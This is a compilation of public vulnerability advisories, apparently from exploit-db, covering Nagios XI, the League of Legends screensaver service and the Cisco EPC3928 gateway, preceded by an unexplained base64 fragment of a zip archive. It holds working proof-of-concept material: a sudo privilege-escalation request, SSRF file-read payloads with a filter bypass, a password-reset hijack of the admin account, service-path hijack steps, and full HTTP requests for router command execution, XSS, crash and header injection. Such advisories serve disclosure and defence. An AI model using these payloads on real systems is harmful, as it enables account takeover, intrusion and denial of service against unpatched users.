vvf2jdcI5Oc4lSJSnNfcevXTPBZ3fI5ab99+5vvKY1nM6PrydEAsURf0513aryupg4J1N0SNf9fd
6z5Guz29LI+2zqmvZuXcUoFRE0MmrrqkQ+J/igjn0U3I5tu7zb0Ue/d9WhLju5SFip3Y0HQpntBW
0tUnPFWUTmupaszewTG0VRJbxPjUrv4u7SPsFtfXVd+eHxcnWigQ21st3YvVsBPuXivF2WXRhKpf
ED8tH8I33vPYSzLnpZdi//5K7D+4EGs5f+8+TK+3rJcPsy83fX/pAhZusG9gawuJDgDtZ/O7xjwG
Wo3TewxruFTJmi+dpsurwjxV92ajhTvNRgmMPjsTh6G9AHUvLs/5Bw/67vrk9JCOD/B8uDeW1N83
O7fFmUrGMeJbmXCBDRrzTreJkGLh4BAvicKhQO+E1Vzg6/PDowFpZYwcI8Xe+tP8Dow4JW7Diko0
FbiIjbtUCdgmVUgDPoxL+A6YoftyD/SAd+1t2KyQwtrJXF1o3+oEqHxm3Fk203GIWU5AbnlkKm6E
1o9pPoKhNi8hSuIUpR8fHdPOzPhoyjfoQxfXC5n9laVvtbLX8V5zHc/AAXm9BRnYrF3aoz2YqoQv
PHpanSp9L6z+u7Rg+vKfCVyvh3aUny2fnuci4Ww3tn6dwxhstmON6cPUqBmE6hTKexsa+g5FFrfa
Z6bTmTQdvsQJzxjTadU5QuedEWpOpeYnO24pJ1ldJdq63+w7fwJQSwECPwMUAwAAAAA9CqxIAAAA
AAAAAAAAAAAACAAkAAAAAAAAABCA7UEAAAAAcHJvZmlsZS8KACAAAAAAAAEAGAAAB2elDazRAQAx
3LoNrNEBAASruQ2s0QFQSwECPwMUAwAAAABlCqxIAAAAAAAAAAAAAAAAEAAkAAAAAAAAABCA7UEm
AAAAcHJvZmlsZS9wcm9maWxlLwoAIAAAAAAAAQAYAABbUdANrNEBAPAL2w2s0QEAW1HQDazRAVBL
AQI/AxQDAAAIACQKrEhqbbyRlwAAANQAAAAbACQAAAAAAAAAIICkgVQAAABwcm9maWxlL3Byb2Zp
bGUvQ0hBTkdFUy50eHQKACAAAAAAAAEAGACACwGHDazRAYALAYcNrNEBAASruQ2s0QFQSwECPwMU
AwAACAAkCqxI51eWwTkAAAA7AAAAHQAkAAAAAAAAACCA7YEkAQAAcHJvZmlsZS9wcm9maWxlL2dl
dHByb2ZpbGUuc2gKACAAAAAAAAEAGACACwGHDazRAYALAYcNrNEBAASruQ2s0QFQSwECPwMUAwAA
CAAkCqxI8IiRZbgEAABXCwAAHwAkAAAAAAAAACCApIGYAQAAcHJvZmlsZS9wcm9maWxlL3Byb2Zp
bGUuaW5jLnBocAoAIAAAAAAAAQAYAIALAYcNrNEBgAsBhw2s0QEABKu5DazRAVBLAQI/AxQDAAAI
ACQKrEiYmhdm9woAAFwcAAAbACQAAAAAAAAAIICkgY0GAABwcm9maWxlL3Byb2ZpbGUvcHJvZmls
ZS5waHAKACAAAAAAAAEAGACACwGHDazRAYALAYcNrNEBAASruQ2s0QFQSwUGAAAAAAYABgB2AgAA
vREAAAAA
[POC - PRIVILEGE ESCALATION EXPLOITATION]
GET /nagiosxi/includes/components/profile/profile.php?cmd=sudo
./getprofile.sh
The default Profile component archive can be downloaded at the following
link:
https://assets.nagios.com/downloads/nagiosxi/components/profile.zip
==Server-Side Request Forgery==
Multiple server-side request forgery vulnerabilities exist in the Nagios
XI application. An attacker can provide arbitrary data to curl_exec
calls to port scan internal services listening on localhost, read files
on the Nagios XI server file system or send data to other hosts in the
same internal network where the Nagios XI server is deployed.
// the application filter the string 'file://' can be bypassed by
converting the handler to uppercase
URL => GET /nagiosxi/ajaxproxy.php?proxyurl=<PAYLOAD>
PARAMETER => proxyurl
POC PAYLOAD => FILE:///<path>/<file>
URL => GET /nagiosxi/backend/?cmd=geturlhtml&url=<PAYLOAD>
PARAMETER => url
POC PAYLOAD => file:///<path>/<file>
==Account Hijacking==
The Nagios XI application is vulnerable to an arbitrary account
hijacking vulnerability due to an insecure implementation of the
password reset functionality. The application does not enforce any
verification to confirm the provided reset token can only be used to
change the login credentials for the specific user for which it was
generated. A limited user can therefore abuse the password reset
functionality to hijack an administrative account by tampering with the
‘username’ hidden parameter during the password reset process.
[POC - ACCOUNT HIJACKING 'nagiosadmin']
POST /nagiosxi/login.php?finishresetpass&username=stduser&token-<reset
token> HTTP/1.1
token=<reset
token>&username=nagiosadmin&password1=<PASSWORD>&password2=<PASSWORD>&reset=1
+----------+
| Solution |
+----------+
Upgrade to Nagios XI 5.2.8.
Please note at the time of this writing the privilege escalation
vulnerability is still unpatched. The SSRF vulnerabilities have been
only partially fixed by blacklisting the 'file://' handler, but all the
other SSRF attack vectors are still exploitable. Vendor stated these
vulnerabilities will be likely patched on the next release of the
application as they require authentication and as such are not
considered major security issues.
+------------+
| Timeline |
+------------+
13/05/2016 – Initial disclosure to vendor
14/05/2016 – Vendor confirms receipt of advisory
25/05/2016 – Vendor provides fixes for most of the vulnerabilities
25/05/2016 – Enquiry about the status of fixes for the unpatched
vulnerabilities
26/05/2016 – Vendor responded with “Since the major issues have been
fixed and the remaining issues I'd like to touch up are only available
if the user is logged in, or logged in as admin, I don't see a reason to
hold onto releasing the advisory.”
2/06/2016 – Public disclosure
+------------+
| Additional |
+------------+
Further information is available in the accompanying PDF.
http://www.security-assessment.com/files/documents/advisory/NagiosXI-Advisory.pdf
# Exploit Title: League of Legends Screensaver Unquoted Service Paths
Conditional Privilege Escalation.
# CVE-ID: NA
# Date: 13/04/2016
# Exploit Author: Vincent Yiu
# Contact: vysec.private@gmail.com
# Vendor Homepage: http://www.leagueoflegends.com
# Software Link: screensaver.euw.leagueoflegends.com/en_US
# Version: MD5 Hash: 0C1B02079CA8BF850D59DD870BC09963
# Tested on: Windows 7 Professional x64 fully updated.
1. Description:
The League of Legends installer would install the League of Legends
screensaver along with a service. The service would be called
'lolscreensaver'. This particular service was misconfigured such that
the service binary path was unquoted. When the screensaver is
installed to 'C:\Riot Games', the issue is not exploitable. However,
during the installation process, users are able to specify a directory
to install to. When a user chooses to install this to say an external
drive, this becomes exploitable.
This was reported to Riot Games and has been rectified in the latest version.
2. Proof
http://i.imgur.com/S2fuUKa.png
3. Exploit:
Simply run 'sc qc lolscreensaver' and check for unquoted service path.
If the path is unquoted, then check the permissions of each directory
using space as a token.
Eg. D:\My Games\Hidden Files\Super Secure\Riot Games\service\service.exe
Do icacls on D:\, 'D:\My Games\', 'D:\My Games\Hidden Files\', 'D:\My
Games\Hidden Files\Super Secure\'. If you are able to write files to
any of these directories, it is exploitable.
If 'D:\My Games\' is writable, to exploit this issue, place a binary
to run as SYSTEM into the folder and named as 'Hidden.exe".
This is released on exploit-db as a means to make users aware. There was no way to automatically install a patch or update to fix this issue. It is recommended that the screensaver is uninstalled and redownloaded from the official website where this issue is now resolved.
# Exploit Title: League of Legends Screensaver Insecure File Permissions
Privilege Escalation
# CVE-ID: NA
# Date: 13/04/2016
# Exploit Author: Vincent Yiu
# Contact: vysec.private@gmail.com
# Vendor Homepage: http://www.leagueoflegends.com
# Software Link: screensaver.euw.leagueoflegends.com/en_US
# Version: MD5 Hash: 0C1B02079CA8BF850D59DD870BC09963
# Tested on: Windows 7 Professional x64 fully updated.
1. Description:
The League of Legends screensaver was installed with insecure file
permissions. It was found that all folder and file permissions were
incorrectly configured during installation. It was possible to replace the
service binary.
This was reported to Riot Games and has been rectified in the latest
version.
2. Proof
http://i.imgur.com/5fVijDK.png
3. Exploit:
Replace service.exe in 'C:\Riot Games\LolScreenSaver\service' to run
service.exe as SYSTEM.
This is released on exploit-db as a means to make users aware. There was no way to automatically install a patch or update to fix this issue. It is recommended that the screensaver is uninstalled and redownloaded from the official website where this issue is now resolved.
# Title: Cisco EPC 3928 Multiple Vulnerabilities
# Vendor: http://www.cisco.com/
# Vulnerable Version(s): Cisco Model EPC3928 DOCSIS 3.0 8x4 Wireless Residential Gateway
# CVE References: CVE-2015-6401 / CVE-2015-6402 / CVE-2016-1328 / CVE-2016-1336 / CVE-2016-1337
# Author: Patryk Bogdan from Secorda security team (http://secorda.com/)
========
Summary:
In recent security research, Secorda security team has found multiple vulnerabilities affecting Cisco EPC3928 Wireless Residential Gateway. Variants of this product can also be affected.
Using combination of several vulnerabilities, attacker is able to remotely download and decode boot configuration file, which you can see on PoC video below. The attacker is also able to reconfigure device in order to perform attacks on the home-user, inject additional data to modem http response or extract sensitive informations from the device, such as the Wi-Fi key.
Until Cisco releases workarounds or patches, we recommend verify access to the web-based management panel and make sure that it is not reachable from the external network.
Vulnerabilities:
1) Unauthorized Command Execution
2) Gateway Stored XSS
3) Gateway Client List DoS
4) Gateway Reflective XSS
5) Gateway HTTP Corruption DoS
6) "Stored" HTTP Response Injection
7) Boot Information Disclosure
========
PoC:
- Unathorized Command Execution
#1 - Channel selection request:
POST /goform/ChannelsSelection HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/ChannelsSelection.asp
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
SAHappyUpstreamChannel=3
#1 - Response:
HTTP/1.0 200 OK
Server: PS HTTP Server
Content-type: text/html
Connection: close
<html lang="en"><head><title>RELOAD</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><script language="javascript" type="text/javascript" src="../active.js"></script><script language="javascript" type="text/javascript" src="../lang.js"></script><script language="javascript" type="text/javascript">var totaltime=120;function time(){document.formnow.hh.value=(" "+totaltime+" Seconds ");totaltime--;} function refreshStatus(){window.setTimeout("window.parent.location.href='http://192.168.1.1'",totaltime*1000);}mytime=setInterval('time()',1000);</script></head><body BGCOLOR="#CCCCCC" TEXT=black><form name="formnow"><HR><h1><script language="javascript" type="text/javascript">dw(msg_goform34);</script><a href="http://192.168.1.1/index.asp"><script language="javascript" type="text/javascript">dw(msg_goform35);</script></a><script language="javascript">refreshStatus();</script><input type="text" name="hh" style="background-color:#CCCCCC;font-size:36;border:none"></h1></form></body></html>
#2 - Clear logs request:
POST /goform/Docsis_log HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/Docsis_log.asp
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
BtnClearLog=Clear+Log&SnmpClearEventLog=0
#2 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.1.1/Docsis_log.asp
Content-type: text/html
Connection: close
- Gateway Stored and Reflective Cross Site Scripting
Example #1:
#1 – Stored XSS via username change request:
POST /goform/Administration HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/Administration.asp
Cookie: Lang=en; SessionID=2719880
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 165
working_mode=0&sysname=<script>alert('XSS')</script>&sysPasswd=home&sysConfirmPasswd=home&save=Save+Settings&preWorkingMode=1&h_wlan_enable=enable&h_user_type=common
#1 – Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.1.1/Administration.asp
Content-type: text/html
Connection: close
#2 – Redirect request:
GET /Administration.asp HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/Administration.asp
Cookie: Lang=en; SessionID=2719880
DNT: 1
Connection: keep-alive
#2 – Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 15832
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
<head>
(...)
<tr>
<td>
<script language="javascript" type="text/javascript">dw(usertype);</script>
</td>
<td nowrap>
<script>alert('XSS')</script>
</TD>
</tr>
<tr>
(...)
Example #2:
#1 – Reflected XSS via client list request:
POST /goform/WClientMACList HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: 192.168.1.1/WClientMACList.asp
Cookie: Lang=en; SessionID=109660
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
sortWireless=mac&h_sortWireless=mac" onmouseover=alert(1) x="y
#1 – Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: 192.168.1.1/WClientMACList.asp
Content-type: text/html
Connection: close
#2 – Redirect request:
GET /WClientMACList.asp HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: 192.168.1.1/WClientMACList.asp
Cookie: Lang=en; SessionID=109660
Connection: keep-alive
#2 – Reponse:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 7385
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
<head>
(...)
</table>
</div>
<input type="hidden" name="h_sortWireless" value="mac" onmouseover=alert(1) x="y" />
</form>
</body>
</html>
(...)
- Gateway Client List Denial of Service
Device will crash after sending following request.
# HTTP Request
POST /goform/WClientMACList HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/WClientMACList.asp
Cookie: Lang=en; SessionID=109660
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
sortWireless=mac&h_sortWireless=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
- Gateway HTTP Corruption Denial of Service
Device will crash after sending following request.
# HTTP Request
POST /goform/Docsis_system HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/Docsis_system.asp
Cookie: Lang=en; SessionID=348080
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 106
username_login=&password_login=&LanguageSelect=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&Language_Submit=0&login=Log+In
- "Stored" HTTP Response Injection
It is able to inject additional HTTP data to response, if string parameter of LanguageSelect won't be too long (in that case device will crash).
Additional data will be stored in device memory and returned with every http response on port 80 until reboot.
devil@hell:~$ curl -gi http://192.168.1.1/ -s | head -10
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 1469
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
devil@hell:~$ curl --data "username_login=&password_login=&LanguageSelect=en%0d%0aSet-Cookie: w00t&Language_Submit=0&login=Log+In" http://192.168.1.1/goform/Docsis_system -s > /dev/null
devil@hell:~$ curl -gi http://192.168.1.1/ -s | head -10
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Set-Cookie: Lang=en
Set-Cookie: w00t
Set-Cookie: SessionID=657670
Content-Length: 1469
- Boot Information Disclosure
In early booting phase, for a short period of time some administrator functions can be executed, and it is able to extract device configuration file. We wrote an exploit that crash the modem, and then retrieve and decode config in order to obtain users credentials.
Exploit video PoC: https://www.youtube.com/watch?v=PHSx0s7Turo
========
CVE References:
CVE-2015-6401
CVE-2015-6402
CVE-2016-1328
CVE-2016-1336
CVE-2016-1337
Cisco Bug ID’s:
CSCux24935
CSCux24938
CSCux24941
CSCux24948
CSCuy28100
CSCux17178
Read more on our blog:
http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/